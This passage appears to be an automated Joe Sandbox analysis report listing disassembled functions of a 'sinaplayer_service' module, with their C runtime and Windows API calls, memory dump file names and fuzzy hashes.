                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$AcquireListLock@details@ReaderSpinWrite@_Writer$A@@details@AliasBase::ClearConcurrency::details::ContextOnce@?$_SleepTableWait@$0
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2118211163-0
                                                                                                                                                                                                    • Opcode ID: 907707b226e98cef61f2b680147494535599f4d0bddcc3a2d107df40518e465c
                                                                                                                                                                                                    • Instruction ID: 087953ef5388e16cdce4fe9616879adbd7a38b6912b160a64828f37bc2f2b8c6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 907707b226e98cef61f2b680147494535599f4d0bddcc3a2d107df40518e465c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451CC31D09756DFEB05CFA8D4907EDBBB0BF09318F55416EDA416B281CB32A904CBA2
                                                                                                                                                                                                    Function 6D0A0D59 Relevance: 10.6, APIs: 7, Instructions: 143COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6D0A0F30,00000000,00000000,00000000), ref: 6D0A0D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6D0A0EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6D0A0ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6D0A0EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6D0A0EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    • Opcode ID: 938ecd7b4937ae83e8520470836c6d3cd616a0a34b0a21956ab050b35b1e2c7c
                                                                                                                                                                                                    • Instruction ID: 713856a7c0c295425809a487c17306bc83fe68a47ce28938c1574e5f4b0b16a6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 938ecd7b4937ae83e8520470836c6d3cd616a0a34b0a21956ab050b35b1e2c7c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D241ADB290021AABFF108EA4DC44FFE3BA9EF48365F150119F908A6251D771DC509790
                                                                                                                                                                                                    Function 6D0ACE5C Relevance: 10.6, APIs: 7, Instructions: 126COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0ACE6B
                                                                                                                                                                                                      • Part of subcall function 6D09F81C: _getptd.MSVCR120(6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F82D
                                                                                                                                                                                                      • Part of subcall function 6D09F81C: _lock.MSVCR120(0000000D,6D09F8A8,0000000C,6D09F8E3,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D09F845
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000220,6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0ACE97
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6D0A8CAC
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: GetCPInfo.KERNEL32(00000000,?), ref: 6D0A8CBB
                                                                                                                                                                                                      • Part of subcall function 6D0A8C4C: memset.MSVCR120(00000019,00000000,00000101), ref: 6D0A8CD3
                                                                                                                                                                                                    • _lock.MSVCR120(0000000D), ref: 6D0ACF16
                                                                                                                                                                                                    • free.MSVCR120(?,6D0ACF58,00000010,6D0ACFF4,000000FD,6D0ACD81), ref: 6D0D759E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd_lock$CodeInfoPageValid_malloc_crtfreemallocmemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1238899101-0
                                                                                                                                                                                                    • Opcode ID: cd80f2e0ed464b80ffbecc3aa40cc0f9e7fe1e912fd51ae8215fe56387d29b59
                                                                                                                                                                                                    • Instruction ID: 65dbcbf499c6561a904f75a26b52b16576acf3177708aa4b901e6d11e4e92377
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd80f2e0ed464b80ffbecc3aa40cc0f9e7fe1e912fd51ae8215fe56387d29b59
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5541F5799083458FEF01CFA9D480B6D37F1BB06324F1A4169E8659B2D3CBB48842CB94
                                                                                                                                                                                                    Function 6D0A82DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,000001CA,97AFC1B1,00000000,00000055,00000000,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A82EF
                                                                                                                                                                                                    • _wcscspn.LIBCMT(6D0A81B3,_.,,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A831B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000040,6D0A81B3,00000000,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A8367
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000010,6D0A81B5,0000000F,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0A83B0
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,6D0A81B3,?,00000000,?,00000000,00000000,00000000), ref: 6D0DF768
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_invoke_watson_wcscspnmemset
                                                                                                                                                                                                    • String ID: _.,
                                                                                                                                                                                                    • API String ID: 1770680180-2709443920
                                                                                                                                                                                                    • Opcode ID: 6af555b26f90af3da67079697a0c32feecf56c28b82adecf8e6ae37705c85c0d
                                                                                                                                                                                                    • Instruction ID: ddd145f57669b93294c67c63f7ff0b951bda28790b4ae5dd4ed44690b35a9538
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af555b26f90af3da67079697a0c32feecf56c28b82adecf8e6ae37705c85c0d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D310772644387B9FB24D6A94880BFF32ACFF01764F984526FB159B182EB60DD40D265
                                                                                                                                                                                                    Function 6D0EB922 Relevance: 10.6, APIs: 7, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EB929
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB950
                                                                                                                                                                                                      • Part of subcall function 6D0EF6A1: __EH_prolog3.LIBCMT ref: 6D0EF6A8
                                                                                                                                                                                                    • malloc.MSVCR120(00000000,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9AA
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9D7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?), ref: 6D0EB9EC
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EBA39
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EBA50
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@?unlock@critical_section@ExceptionH_prolog3H_prolog3_ThrowV12@@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2302070164-0
                                                                                                                                                                                                    • Opcode ID: 28f80d33df6b2184d041d4683b00b98b4cf6ae6a4b98ea68ed68d6f0cec29da8
                                                                                                                                                                                                    • Instruction ID: abf151090389795dc2f3f62cb227573443459ca2a68626aa58a63c5615edebbb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28f80d33df6b2184d041d4683b00b98b4cf6ae6a4b98ea68ed68d6f0cec29da8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35418971A05316CFEB14CFA9C880BAEBBF1BF85384F194069DA44AB350DBB19D01CB90
                                                                                                                                                                                                    Function 6D106F6D Relevance: 10.6, APIs: 7, Instructions: 107timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D106F91
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D106F9B
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D106FBE
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6D106FE4
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6D107018
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6D10707E
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D1070B0
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$FeatureFileInformationPresentProcessProcessorSystemTerminateZone__aullrem__crt_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1117467957-0
                                                                                                                                                                                                    • Opcode ID: 64615783553e44f1c01cbb547465ee55f5337863be3e1e2d3223ea413e84b061
                                                                                                                                                                                                    • Instruction ID: 964d81d552c830f146fa6ba9adcb9cd12a6c49485571f9a1721b357785796131
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64615783553e44f1c01cbb547465ee55f5337863be3e1e2d3223ea413e84b061
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3731ECB1A04315ABEB20DFA4DC81FAB737CEB4A704F11455EE205D7285DBF09980CB65
                                                                                                                                                                                                    Function 6D1015C3 Relevance: 10.6, APIs: 7, Instructions: 105COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D101708,00000018), ref: 6D1015E2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D101708,00000018), ref: 6D1015ED
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,6D101708,00000018), ref: 6D10161D
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,6D101708,00000018), ref: 6D10162E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D101708,00000018), ref: 6D101688
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D101708,00000018), ref: 6D101693
                                                                                                                                                                                                    • _filbuf.MSVCR120(?,?,?,6D101708,00000018), ref: 6D1016B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_filbuf_fileno_invalid_parameter_lock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1327458189-0
                                                                                                                                                                                                    • Opcode ID: af89b61d606b3d96fa00f4f12902d34e4f849a392aa51b4d98e7292b3280ef8a
                                                                                                                                                                                                    • Instruction ID: 30a26b16fd61efa8ae83b87dd15f694c98c231e5ca9c140aa5a6aea047e3eabb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: af89b61d606b3d96fa00f4f12902d34e4f849a392aa51b4d98e7292b3280ef8a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31D5B1A042068BDB01AF798C4036976E1AF5536CF1A8359E535CF1D8DFFC85C18B11
                                                                                                                                                                                                    Function 6D0EC8B8 Relevance: 10.6, APIs: 7, Instructions: 92threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EC8BF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0EC90D
                                                                                                                                                                                                      • Part of subcall function 6D0EF8AE: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,.im,?,6D0D2519,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0EF8BD
                                                                                                                                                                                                      • Part of subcall function 6D0EF904: ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(6D15CEE8,?,6D0EC958,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6D0A793F), ref: 6D0EF90A
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCMT ref: 6D0EC95F
                                                                                                                                                                                                      • Part of subcall function 6D0F5CEF: SetEvent.KERNEL32(00000000,?,6D0EC964,?,00000000,00000000), ref: 6D0F5D3D
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(Function_000DCF08,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,6D0A793F,00000000), ref: 6D0EC96E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(Function_000DCF08,?,?,?,?,?,?,?,?,?,?,?,6D0A793F,00000000), ref: 6D0EC99C
                                                                                                                                                                                                    • TlsGetValue.KERNEL32(6D15CF6C,?,00000024,6D0D3640,00000000,6D15CEE8), ref: 6D0EC9BA
                                                                                                                                                                                                    • TlsSetValue.KERNEL32(6D15CF6C,?,?,00000024,6D0D3640,00000000,6D15CEE8), ref: 6D0EC9C5
                                                                                                                                                                                                      • Part of subcall function 6D0F5773: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F57C1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency::details::Concurrency@@CriticalManager@1@Proxy::ResourceSchedulerSectionValue$BorrowedCoreCurrentEnterEventH_prolog3_IncrementLeaveStateSubscriptionThreadToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1834826012-0
                                                                                                                                                                                                    • Opcode ID: 0cbb9ea73e23633b16c3eec286ffcd62fa1cc183e111d41fb3c7c3f8d1ccc6d3
                                                                                                                                                                                                    • Instruction ID: 50821528d0458bd75460e8e535049a536ff12b56f8838374ad2a1cf005a14473
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cbb9ea73e23633b16c3eec286ffcd62fa1cc183e111d41fb3c7c3f8d1ccc6d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831C470A04206DFDF08DFA4D4C8ABEBBB5FF48304B058199ED059B256D774E841CBA5
                                                                                                                                                                                                    Function 6D0E8FB1 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • malloc.MSVCR120(00000008,00000000), ref: 6D0E8FBC
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6D0E8FFA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,00000000), ref: 6D0E900F
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0E901C
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E9025
                                                                                                                                                                                                    • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E907E
                                                                                                                                                                                                    • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,0000001C,6D0F7D40,6D0F7DB6), ref: 6D0E90A0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@??2@?unlock@critical_section@AllocExceptionH_prolog3HeapThrowV12@@mallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3930479332-0
                                                                                                                                                                                                    • Opcode ID: 50b6d77657ea64918eede118608c7e906edf80b765622978e2658019f50b9b68
                                                                                                                                                                                                    • Instruction ID: a985ccdc9151c024a542899bd957d01c517edf2d636896cf4034676b4e134f61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50b6d77657ea64918eede118608c7e906edf80b765622978e2658019f50b9b68
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 683198B59087069FE724DF64D480B9EBBF4BF40354F50892EE9959B240DB71AA44CB81
                                                                                                                                                                                                    Function 6D0F88EB Relevance: 10.6, APIs: 7, Instructions: 87COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0F88F2
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000020,6D0F921D,?,?,?), ref: 6D0F895D
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
